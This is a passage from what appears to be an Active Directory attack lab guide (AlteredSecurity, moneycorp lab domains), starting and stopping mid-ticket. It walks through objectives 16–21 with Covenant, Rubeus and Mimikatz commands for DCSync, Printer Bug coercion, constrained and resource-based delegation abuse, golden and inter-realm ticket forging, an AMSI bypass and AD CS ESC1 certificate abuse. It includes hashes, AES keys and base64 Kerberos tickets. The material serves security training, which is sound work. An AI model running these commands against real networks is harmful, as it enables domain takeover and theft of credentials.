Uik6pWrYyspA8GHVzV8fzpd1Jjsq4Lnxf6KyeWLyoTPNOyUXi3lrQiEb6eXyRXhyc
1ej93+wYczKbuk+EUVCTs9SfujNtGPk2K8nE9D1sZZJPhWlogVnGvN1Ad7lUOiHyW
DDv+VuZ/Qq591dS7AsAjq+65VD3tZ0FXLdYdqC/eke08IDeo+6BEtEDHasJdrJxie
u2pCj8PYKL1IiV0Bdml1RZ7E0ua4pXKCu6nXTgTtyofJm8JbIcVFt/TpmFqaPwaS2
pVcrMeLOLuq5ZkB3X+wRs1kI80riJsJLIZ+rdUF2tovqD2QEIjngDZYzl+esCbHrF
a3aB4Gn5brcgM6pirftbgIEF4bp9qNQAAoeYnLgkJ1zEVwgVVBTumG/CWF6RYA6Ic
C7iysZ4CjxtRi/4kDt5/rBZl4v+MVUhIE9an4bJ4mRpe55cR7HNxW2sxdc1CW1S/5
rGmBNRQhwWMBBzrfF7STeEtgUBt5JmwzCF1EkY2yV2aoBA1/bqu7nmnGCVavKMjHz
JSIOSNdbG+2rbqdouLOXOZyIbE3ARx2lxXrvYjgrh2Z2vIfb/Yrmo6VgaMHzlDQ9W
upOn774h5lBop/VGfeVw2hkSLZxMMJj+eNDJAM/fRRTVcwwjMhLj2mtLsCvOPUYJj
r6idhaXM3Yrv1TeGJzmq7wGd/mAjpEshbmuzE64NdVV9mzrZt5B3pl4Z9uqSITnG6
/dkZdJs0MA4r4oSLuaBl8FZPDTbvk0BxOC3PMGrJ8yf2fX+dxniSMHh6+7MHR0Gv4
1jXC85cSgdCQUyoaWoNBbTQXQABrINshNaBIjTzzEd78mB45SZOlCSCG9DgUq9JXH
BhFaWJy8K9wljn8uhqiJx1KxRRkRnix7XsIltDnDXtH5Tf5e+AXx1YQ2RjxKtUGFr
aY+tIaiSwlC83yiNV5hS8ejegIGrI8vNW0AREPymMef3SBmVWmbN6JOoNM0OUaDRi
j49YcV/WSBh4wwIMe0+5OA7YK4Jz6C0og86Pn/S5Z/RL2GTiXNZkKdS3uTMpOXLWc
kRgPNzueOKmCFIpGDDPonK27mfk7zile3uE2geElYyYQrJcPCFzDJ14TO7uMYiEuy
0Ag6xJ4IAcnEVz30iOxK4yj0PInKu0jQ/mV3qFIVd4qZxYwEKNMgPBktWm7Agr+1a
c30T4ZzBKJxI2yvGzlHiHYgGxIpxDpQpOKvs99cX4rTvL1NzlaDNV39Jp/oPtd8ju
6E6X5WPN6OUXJLWN/d/oG3N8ev8s2wOsYNhBpYzjOgMJont+NM/1HjyxaW0bw2VVN
c7hZzc0yqdKeA/Xlt4SVTdwHHUK12tuhBYEIlMbTND1c5D74g9d6HjtBoWgULo7vx
NygCRTdxoPvT7jk6kfTdEwEujggEVMIIBEaADAgEAooIBCASCAQR9ggEAMIH9oIH6
MIH3MIH0oCswKaADAgESoSIEIDD6YEm2rl/a+8ysFW1wHIouBWuFZ6x2cuf0B0Rvk
UkCoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohYwFKADAgEBoQ0wCxsJRE
NPUlAtREMkowcDBQBgoQAApREYDzIwMjMwMzIwMDc1NDIzWqYRGA8yMDIzMDMyMDE
3NTQyM1qnERgPMjAyMzAzMjQxMzIwNDFaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQ
LkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SU
C5MT0NBTA==
AlteredSecurity Attacking and Defending Active Directory 152
Now, we can perform the DCSync attack using the Built-in Mimikatz task. Enter
"lsadump::dcsync /user:dcorp\krbtgt" in the command field.
AlteredSecurity Attacking and Defending Active Directory 153
AlteredSecurity Attacking and Defending Active Directory 154
Task - Escalate to Enterprise Admins privileges by abusing Printer Bug!.
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the
below command to listen for mcorp-dc$ tickets on dcorp-appsrv.
• Command
Rubeus monitor /targetuser:MCORP-DC$ /interval:5 /nowrap
AlteredSecurity Attacking and Defending Active Directory 155
Now, from the Student VM we will force the authentication from mcorp-dc$ using MS-RPRN.exe
file.
• Command
ShellCmd C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local
\\dcorp-appsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 156
On the Rubeus listener, we can see the TGT of mcorp-dc$
Once we get our ticket, we need to kill the Rubeus task. First, we need to list all the running task
and the use the Task id to kill the task as shown in the below screenshot.
AlteredSecurity Attacking and Defending Active Directory 157
So now let us inject the ticket in the StudentVM grunt. Before injecting the ticket, we will need
to create a new token using MakeToken and then inject the ticket. We need to first execute
RevertToSelf command.
• Command
RevertToSelf
MakeToken MCORP-DC$ moneycorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 158
• Command
Rubeus ptt
/ticket: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
AlteredSecurity Attacking and Defending Active Directory 159
Now, we can perform the DCSync attack using the Built-in Mimikatz task. Enter
"lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" in the command field.
Awesome! We escalated to Enterprise Admins too!
AlteredSecurity Attacking and Defending Active Directory 160
Learning Objective 16
Task
• Enumerate users in the domain for whom Constrained Delegation is enabled.
o For such a user, request a TGT from the DC and obtain a TGS for the service to
which delegation is configured.
o Pass the ticket and access the service.
• Enumerate computer accounts in the domain for which Constrained Delegation is
enabled.
o For such a user, request a TGT from the DC.
o Obtain an alternate TGS for LDAP service on the target machine.
o Use the TGS for executing DCSync attack.
Solution
Task - Enumerate users in the domain for whom Constrained Delegation is
enabled.
We first need to find a server that has constrained delegation enabled. We will use Student
VM for enumeration. We will use PowerView.ps1 PowerShell script for enumeration. Steps
to import PowerView script can be found in the earlier section.
AlteredSecurity Attacking and Defending Active Directory 161
• Command
PowerShell Get-DomainUser -TrustedToAuth
We already have the hash of websvc that we extracted from dcorp-admisrv machine. We
can either use Kekeo or Rubeus to abuse the constrained delegation feature using the aes
key of websvc user. We will use Rubeus to abuse the Constrained Delegation feature. We
will use Student VM to abuse the Constrained Delegation.
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket. We need to first execute RevertToSelf command.
• Command
RevertToSelf
MakeToken administrator dollarcorp.moneycorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 162
• Command
Rubeus s4u /user:websvc
/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07
e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/dcorp-
mssql.dollarcorp.moneycorp.local /ptt
Try accessing filesystem on dcorp-mssql
• Command
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
AlteredSecurity Attacking and Defending Active Directory 163
Task - Enumerate computer accounts in the domain for which Constrained
Delegation is enabled.
For the next task, enumerate the computer accounts with constrained delegation enabled
using PowerView. We need to execute RevertToSelf command before enumerating.
• Command
RevertToSelf
PowerShell Get-DomainComputer -TrustedToAuth
AlteredSecurity Attacking and Defending Active Directory 164
Next, let us abuse constrained delegation of dcorp-adminsrv$ using Rubeus. Note that in
/altservice parameter we need to specify ldap so that we can perform the DCSync attack.
Please note that the hash of dcorp-adminsrv$ may be different for you in the lab. We will
use Student VM for performing the activity.
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
MakeToken administrator dollarcorp.moneycorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 165
• Command
Rubeus s4u /user:dcorp-adminsrv$
/aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c
382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-
dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
AlteredSecurity Attacking and Defending Active Directory 166
Now, let us perform the DCSync attack. We will use the Built-in Mimikatz task.
Enter "lsadump::dcsync /user:dcorp\krbtgt" value in the Command field.
AlteredSecurity Attacking and Defending Active Directory 167
Learning Objective 17
Task
• Find a computer object in dcorp domain where we have Write permissions.
• Abuse the Write permissions to access that computer as Domain Admin.
Solution
Task - Find a computer object in dcorp domain where we have Write
permissions.
After trying from multiple users or using BloodHound we would know that the user ciadmin
has write privileges on the computer object of dcorp-mgmt. We need to execute
RevertToSelf command before enumerating.
• Command
RevertToSelf
PowerShell Find-InterestingDomainAcl| ?{$_.identityreferencename
-match 'ciadmin'}
AlteredSecurity Attacking and Defending Active Directory 168
Task - Abuse the Write permissions to access that computer as Domain
Admin.
Recall that we compromised ciadmin from dcorp-ci. We will use the grunt that we have on
dcorp-ci as ciadmin. We will use PowerView to abuse the RBCD on dcorp-mgmt. To import
PowerView we can follow the steps mentioned earlier. But before that we need to run the
AMSI Bypass using the built-in command BypassAmsi.
• Command
PowerShell Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom
'dcorp-student2$' -Verbose
AlteredSecurity Attacking and Defending Active Directory 169
Now, let us check if RBCD is set correctly.
• Command
PowerShell Get-DomainRBCD
Let us extract the AES Keys from the student VM using Built-in Mimikatz . Enter
"sekurlsa::ekeys" in the parameters field. We will need to use elevated grunt of our student
VM.
AlteredSecurity Attacking and Defending Active Directory 170
AlteredSecurity Attacking and Defending Active Directory 171
Now let us use Rubeus to abuse RBCD to gain access on dcorp-mgmt as Domain Administrator –
Administrator. We will use our student VM grunt to abuse RBCD. Before injecting the ticket,
we will need to create a new token using MakeToken and then inject the ticket.
• Command
MakeToken administrator dollarcorp.moneycorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 172
• Command
Rubeus s4u /user:dcorp-student2$
/aes256:79b8e7b089ec5fb15ef481783d9b335223d2786923c1d8e6f6032d952
7ae99f8 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator
/ptt
Now, let us check if we can access dcorp-mgmt.
• Command
PowerShell Invoke-Command -ComputerName dcorp-mgmt -
ScriptBlock{whoami}
AlteredSecurity Attacking and Defending Active Directory 173
Learning Objective 18
Task
• Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin
or DA to the parent domain, moneycorp.local using the domain trust key.
Solution
Task - Using DA access to dollarcorp.moneycorp.local, escalate privileges to
Enterprise Admin or DA to the parent domain, moneycorp.local using the
domain trust key.
We need the trust key for abusing the trust between dollarcorp and moneycrop, which can
be retrieved using mimikatz. We can run the below mentioned command to extract the
trust key from the dcorp-dc grunt. We will use Built-in Mimikatz task to extract the trust
key. Enter "lsadump::trust /patch" in the command field.
Note: In case we have lost the grunt we can follow the steps mentioned in earlier section to
get a new grunt on dcorp-dc machine.
AlteredSecurity Attacking and Defending Active Directory 174
Forge a ticket with SID History of Enterprise Admins by running the below command on
Student VM. We will use Mimikatz PowerShell script to create the TGT. The steps to import
the Mimikatz PowerShell script is covered in the earlier section.
• Command
PowerShell Invoke-Mimi -Command '"kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-
5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-
960912869-3279953914-519 /rc4:132f54e05f7c3db02e97c00ff3879067
/service:krbtgt /target:moneycorp.local
/ticket:C:\Users\Public\trust_tkt.kirbi"'
AlteredSecurity Attacking and Defending Active Directory 175
Now, let us check if the file saved on the disk.
• Command
ls C:\Users\Public\
AlteredSecurity Attacking and Defending Active Directory 176
We request and inject a TGS using Rubeus that leverages the TGT created by Mimikatz in the
below command. We will need to use the new version of Rubeus to inject the ticket. We will
use the Assembly Task to perform the same. Before injecting the ticket, we will need to
create a new token using MakeToken and then inject the ticket.
• Command
RevertToSelf
MakeToken administrator moneycorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 177
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
AlteredSecurity Attacking and Defending Active Directory 178
3. Select Assembly from the GruntTask.
4. Browse the Rubeus.exe file.
5. Enter Rubeus.exe value in AssemblyName field.
6. Enter asktgs /ticket:C:\Users\Public\trust_tkt.kirbi /service:cifs/mcorp-
dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /domain:moneycorp.local
/ptt value in Parameters field.
7. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 179
Now, try to access the target service – a success means escalation to the parent DA:
• Command
ls \\mcorp-dc.moneycorp.local\c$
AlteredSecurity Attacking and Defending Active Directory 180
Learning Objective 19
Task
• Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin
or DA to the parent domain, moneycorp.local using dollarcorp's krbtgt hash.
Solution
Task - Using DA access to dollarcorp.moneycorp.local, escalate privileges to
Enterprise Admin or DA to the parent domain, moneycorp.local using
dollarcorp's krbtgt hash.
We already have the krbtgt hash from dcorp-dc. Let us create the inter-realm TGT and
inject. We will use the Student VM and PowerShell script of Mimikatz to create the inter-
realm TGT.
Note: - We can also inject the ticket directly while creating by passing /ptt as the argument
to Mimikatz.
AlteredSecurity Attacking and Defending Active Directory 181
• Command
PowerShell Invoke-Mimi -Command '"kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-
5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-
960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986
/ticket:C:\Users\Public\krbtgt_tkt.kirbi"'
AlteredSecurity Attacking and Defending Active Directory 182
Next, inject the ticket using mimikatz
• Command
PowerShell Invoke-Mimi -Command '"kerberos::ptt
C:\Users\Public\krbtgt_tkt.kirbi"'
Sweet! Let us run DCSync against mcorp-dc to extract secrets from it. We will use the Built-
in Mimikatz task to perform the dcsync. Enter "lsadump::dcsync /user:mcorp\krbtgt
/domain:moneycorp.local" in the command field.
AlteredSecurity Attacking and Defending Active Directory 183
AlteredSecurity Attacking and Defending Active Directory 184
Learning Objective 20
Task
• With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share
on the DC of eurocorp.local forest.
Solution
Task - With DA privileges on dollarcorp.moneycorp.local, get access to
SharedwithDCorp share on the DC of eurocorp.local forest.
We need the trust key for abusing the trust between dollarcorp and eurocorp, which can be
retrieved using mimikatz. We can run the below mentioned command to extract the trust
key from the dcorp-dc grunt. We will use Built-in Mimikatz task to extract the trust key.
Enter "lsadump::trust /patch" in the command field.
Please note that the trust key may be different in your lab.
AlteredSecurity Attacking and Defending Active Directory 185
AlteredSecurity Attacking and Defending Active Directory 186
Forge the inter-realm TGT. We will run the below command from the student VM grunt.
• Command
PowerShell Invoke-Mimi -Command '"Kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-
5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-3333069040-
3914854601-3606488808-519 /rc4:163373571e6c3e09673010fd60accdf0
/service:krbtgt /target:eurocorp.local
/ticket:C:\Users\Public\trust_forest_tkt.kirbi"'
AlteredSecurity Attacking and Defending Active Directory 187
Now, let us check if the file saved on the disk.
• Command
ls C:\Users\Public\
AlteredSecurity Attacking and Defending Active Directory 188
Get a TGS for a service (CIFS) in the target forest (eurocorp.local) using Rubeus. We will
need to use the new version of Rubeus to inject the ticket. We will use the Assembly Task to
perform the same. We can follow the steps mentioned above in the earlier sections to load
Rubeus assembly. Enter asktgs /ticket:C:\Users\Public\trust_forest_tkt.kirbi
/service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local
/domain:eurocorp.local /ptt value in Parameters field.
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
RevertToSelf
MakeToken administrator eurocorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 189
Now, try to access the target folder and file
• Command
ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
AlteredSecurity Attacking and Defending Active Directory 190
• Command
PowerShell cat \\eurocorp-
dc.eurocorp.local\SharedwithDCorp\secret.txt
AlteredSecurity Attacking and Defending Active Directory 191
Learning Objective 21
Task
• Check if AD CS is used by the target forest and find any vulnerable/abusable templates.
• Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.
Solution
Task - Check if AD CS is used by the target forest and find any
vulnerable/abusable templates.
We will use Certify tool to enumerate the Certificate Authorities in the target forest. Since
Certify tool is not a part of Covenant by default, we will leverage the built-in task Assembly
to load and run the Certify tool. Below are the steps to use external .Net Executables with
the Built-in task Assembly. Please execute RevertToSelf command before executing
Certify.exe tool.
• Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 192
2. Click on the Task tab
3. Select Assembly from the GruntTask.
4. Browse the Certify.exe file.
5. Enter Certify.exe value in AssemblyName field.
6. Enter cas value in Parameters field.
7. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 193
We can list all the templates using the following command. Going through the output we can
find some interesting templates.
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "find" .
AlteredSecurity Attacking and Defending Active Directory 194
The template HTTPSCertificates looks interesting. Let us get some more information about it
as it allows requestor to supply subject name.
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "find /enrolleeSuppliesSubject".
AlteredSecurity Attacking and Defending Active Directory 195
Task - Abuse any such template(s) to escalate to Domain Admin and
Enterprise Admin.
Privilege Escalation to DA and EA using ESC1
Sweet! The HTTPSCertificates template grants enrollment rights to RDPUsers group and
allows requestor to supply Subject Name. Recall that studentx is a member of RDPUsers
group. This means that we can request certificate for any user as studentx.
Let us request a certificate for Domain Admin – Administrator
We can follow the above steps to run the built-in Assembly task and by modifying the
parameters field to "request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:HTTPSCertificates /altname:administrator".
AlteredSecurity Attacking and Defending Active Directory 196
Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it
to cert.pem file on the Covenant instance. We need to convert the cert.pem file to .pfx file. We will
use openssl with SecretPass@123 as the export password.
Note: Remove the blank lines while trying to save the output to cert.pem file.
• Command
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced
Cryptographic Provider v1.0" -export -out esc1-DA.pfx
Use the PFX created above with Rubeus to request a TGT for DA - Administrator!
Note: Since the current version of Rubeus that is bundled with Covenant does not have
features for abusing Certificates, we will leverage the built-in Assembly task to upload a new
version of Rubeus and perform the attack.
First, we need to Upload the Certificate on the student VM.
• Command
Upload C:\AD\Tools\esc1-DA.pfx
AlteredSecurity Attacking and Defending Active Directory 197
Now we need to run Rubeus to request a TGT.
Follow the steps mentioned in the above section to execute external .Net Executables with
the Built-in task Assembly. Enter asktgt /user:administrator /certificate:C:\AD\Tools\esc1-
DA.pfx /password:SecretPass@123 value in Parameters field.
AlteredSecurity Attacking and Defending Active Directory 198
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
MakeToken administrator dollarcorp.moneycorp.local dummypassword
• Command
Rubeus ptt
/ticket:doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbG
kRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gx
pkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOCBWIwggVeoAMCARKhAwIBAqKCBVA
EggVMCVknnfZj8DsG3FhQZ6JTR32l5DqKyJI8cnxfDCcUJOCtmYTgTuERyQAjqjmm
Mv9tGdHr46ORf4KqoiQTSbJAnZeZt29ZzHtOiAiB5kijZo19XU8RSTFiei0m9o+wJ
OWFGGoXP18zXH4venk4NF+xJ6iDcN4zxt1W+BqIplzZ5Bii4NRzbkDYVNeTG16ttd
WhW4WzyXO1Xfmi0GXLLMgKVG9C1ibC9pH/HUtN0D4zbhHmc7VEI1GfFU+OKHr7Ni7
dXwEGJO6flvQvTwoWVp2wV/UYSgHDxkY41T+bycuNvcFYXefmvUaauwAYy9Xvj3V4
+Kz7qgidhqlbAK3NRytlRM9TYC97IIN/ganDdrmq46sHX2lzNT6jObEg2J8Chi83R
IZkjHb9+GSZpTzKG+Z7co/UdwVdUSXjURWPTy2kDvpV7SRdl1Dag5CYzW8ZVQV+iK
jcFVG7dxguOyCB/c6O5Fp9NSGLbewhD0JHcjlG6XQqH6PGXsKHJ6Iazw/7UZmdQgy
h1wmlrsTSsDVHjhYH2VnpCMi7tOQt6npFqDTQGEblLUi7Z6g9pR5YLqh4OHpnNQ5y
CIy2GadNsSfv/xiSxRx2mJLHj9YYBr5u/JGvgWyC9hTKsnDS50LHA//owIQyPnFCl
zB805oCP8Eu/8z/QNCoH0rO1Wf1sakv/TorG7gNgqcqC/J3OO/xU32TffUi4WDux8
C1/5eQZaEJE/1U6tKm6VyjIbTq/3IS84C0qcwvccyE8QIoJVC+BIn2w8FJuhecY/V
rvZoyvKt0jWb8P5wRNme0oIq5lnTHmOQ9zZTtoKoWTl9hOBTHCF4lf+EiLMK7NXEs
gIsuo/4aLUnLp0mlIzo2W/96U/daYf5DZxgmJqm/BGElLXCZnEcYbgYRJTyJIxeOy
JNc9xNes+TSbMDK90uLJWCzR8s3IVxCQMUldn7SE4gjfQz1+0Vgo953YP03D8VoAy
MiD2Z1De/sgycRGYWCGYNN/GP6fBxNIBjKDirSAiJhOpIHNWPb4+8yEPh1wiC3w0x
03e5s+zrhUeh6zXrL9sTXGG3P4vr994+wxaIsW3bZKK87SluRzXH26ABLt3nObx3E
PJld6Qj6cmGQctq3SBD28cRAizgl5Ppviqs6d8rawZeE0DIXXA88UhOUfZFz00Cna
JfjTDfrhQ4hC0/jWhQo+S9eH6fYcCaHkIOfD25izq+VXdah6a6VuTf3OBBPQh2YqZ
Gj5+trEFTHrG2VOvbFMDYIapMyYrP4NT1JlmuLt+BKFwJtAtRWANgA+ospPtDJDUp
n9iRWkqppBBNBqahPu+aCPZdc0VRtIocWw/6T7M/YWEWA05hg+ikoQbMXO5ZGxVyr
FnZb82lATOc0anr2aN07fEqDM8rABbAfF9UHEYkWXdmwJbF9T4k4VwBj5HwJ5Wjux
AlteredSecurity Attacking and Defending Active Directory 199
QQWRZa2ptrR7+E9LzncVfHj8OSjlyhqf9wib3TwgQby7u1V7oqCzMLZQN5X1bz+RA
/NC1w/r7o80OZVZ/5zAU4h9k3JBBX6MD5pGpWKrcs8xjH144iQFtBGOxNHDmLtMFx
7Xl7zi1E0CFqYoBR8Q6JgY+Pzby4J5F2sEmOXqidYMb78106Ifkcr2Xya+SGMC42t
5Jyu0ESjE4seSSxosuoO3zon8BjKP6l7l0oPoUbHqd3kN4yuDJ+xCcfPulDpaJ51S
smqUyw0QZxsVQ9U/3pParsg+CcpeBHqOKTum2PhiWQvWy+Edf24XbRjZJKPbY0g1r
mvq6m+QDnp3e/M/kunTIGioLpM383A33yshEEnVWpiw1NeNzTQpNTpo/Wko4IBBjC
CAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KAbMBmgAwIBF6ESBBCmWzFZ/mEz
Wt1goyNnT1vToRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBo
REwDxsNYWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDIzMDMyMDE4NDYxOFqmER
gPMjAyMzAzMjEwNDQ2MThapxEYDzIwMjMwMzI3MTg0NjE4WqgcGxpET0xMQVJDT1J
QLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29y
cC5tb25leWNvcnAubG9jYWw=
Let us check if we have the DA privileges now.
• Command
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
AlteredSecurity Attacking and Defending Active Directory 200
Similarly, we can get Enterprise Admin privileges!
We can leverage the same certificate to request the TGT for EA or else execute the same
command and request a new certificate. We can follow the above steps to run the built-in
Assembly task and by modifying the parameters field to asktgt
/user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc1-DA.pfx /dc:mcorp-
dc.moneycorp.local /password:SecretPass@123. But before running the above command
we need to run RevertToSelf.
AlteredSecurity Attacking and Defending Active Directory 201
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
MakeToken administrator moneycorp.local dummypassword
• Command
Rubeus ptt
/ticket:doIGhjCCBoKgAwIBBaEDAgEWooIFjTCCBYlhggWFMIIFgaADAgEFoREbD
01PTkVZQ09SUC5MT0NBTKIkMCKgAwIBAqEbMBkbBmtyYnRndBsPbW9uZXljb3JwLm
xvY2Fso4IFPzCCBTugAwIBEqEDAgECooIFLQSCBSmcgQx3HWN3jQK8bnhH+qoE6XW
4Gmv6DfrlvxiGRjt5SiMCBDOXzgKupqOb9oN0CCAj+XPcK2tU9X8AxNjkJ9+J+pb8
GFeysiSwrz9wQRroOeULcyeeIyxB1ADAdv586KCpwjvrORQyOUSHZrkp2Ty56daNk
Wtdmq43hEYBuYzi83Wqtbz/ZFTqEV917oBvJYn33zxRJxd+EwRIVSj1mXIvhpr7Z0
Cd09zOFqRuTWMmnNW0+65KZgiH/qnyFAH6/EibOQr6DVOBp+hAvteM1+LuFa9VCZz
gryvn1kkxvqV60D6j4KQY/HMNxr8ZDFAHqSwdHHvhQPtd4HROqZYthuItvHuC/g19
lA1Px9CHhTXVY4tJkkK0CtBt8vgJYnD7XRUamgtqYwkR1gXpTu5atzCuqxjNxUl2y
ulARagR+WOfdjtinGqvXrPZTLiaI4PNmb8iGhZGP7z1zXmOV9xZAmhojMaO+Mpyua
9w5R6skPzruacBE92r6BFdMhrIBhBcayJxoQAh2sc+zFtq6ev4KU6JIy5LXD1rQr9
DzJ2U03fFixujiyXSpKPMTWs4192GxN/cS+djCwDnQ841tRFsq0SeRY0Hx4zHdRY7
17soLXbrc7/pv/lgZVEa2qOwWtdMRswRC93EJts0Luoc2T/sBNEhajONVBGg1ndvK
ZWP3IIsZ0Hi8G7lOb1m33YWgjpLhnzHKkgLB2X5mCU6H3FwePxpZxQrC16x43GUMD
A4CmjDXybulEuRIFu0Qr51O/UUkZU0ROt4kpkHpmUy+92g38vD+L9mHZJlLJehdjJ
